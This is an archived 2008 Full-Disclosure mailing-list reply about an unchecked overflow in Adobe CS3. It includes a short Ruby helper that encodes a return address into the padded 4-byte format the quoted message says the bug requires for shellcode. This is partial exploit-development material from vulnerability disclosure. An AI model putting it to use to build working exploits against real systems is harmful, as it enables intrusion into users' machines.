Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security FullDisclosure
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re: [Full-disclosure] Adobe Unchecked Overflow

from [Kevin Finisterre (lists)] Network Security [Permanent Link]
Subject: Re: [Full-disclosure] Adobe Unchecked Overflow
Date: Mon, 21 Apr 2008 10:43:27 -0400 
I've been beating on CS3 a bit the past few days myself... I ran  
across the same issue. Here is a little helper function

def addr_to_asc_pad(addr)
         low = (addr & 0x0000ffff)
         high = (addr & 0xffff0000) >> 16
         a = (low & 0x00ff)
         b = (low & 0xff00) >> 8
         c = (high & 0x00ff)
         d = (high & 0xff00) >> 8
         sprintf( "%s\x00\x00%s\x00\x00%s\x00\x00%s\x00\x00", a.chr,  
b.chr, c.chr, d.chr )
end

-KF


On Apr 21, 2008, at 7:23 AM, c0ntex wrote:



There is a caveats to the bug as the shellcode and return address  
need to be 4
byte values. Thus a return address of 0x41424344 needs to be in the  
following
format:  
"\x44\x44\x44\x44\x43\x43\x43\x43\x42\x42\x42\x42\x41\x41\x41\x41"

...

regards
c0ntex
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Re: [Full-disclosure] [CKA-001] Your Chat underflow vulnerability, James Lay
Next by Date:  SyScan'08 Singapore - Call for Paper, organiser@syscan.org
Previous by Thread:  [Full-disclosure] Adobe Unchecked Overflow, c0ntex
Next by Thread:  [Full-disclosure] Employment Opportunities for Java/.NET Programmers and pen-testers, Lindley James R
Indexes:  [Date] [Thread] [Top] [All Lists]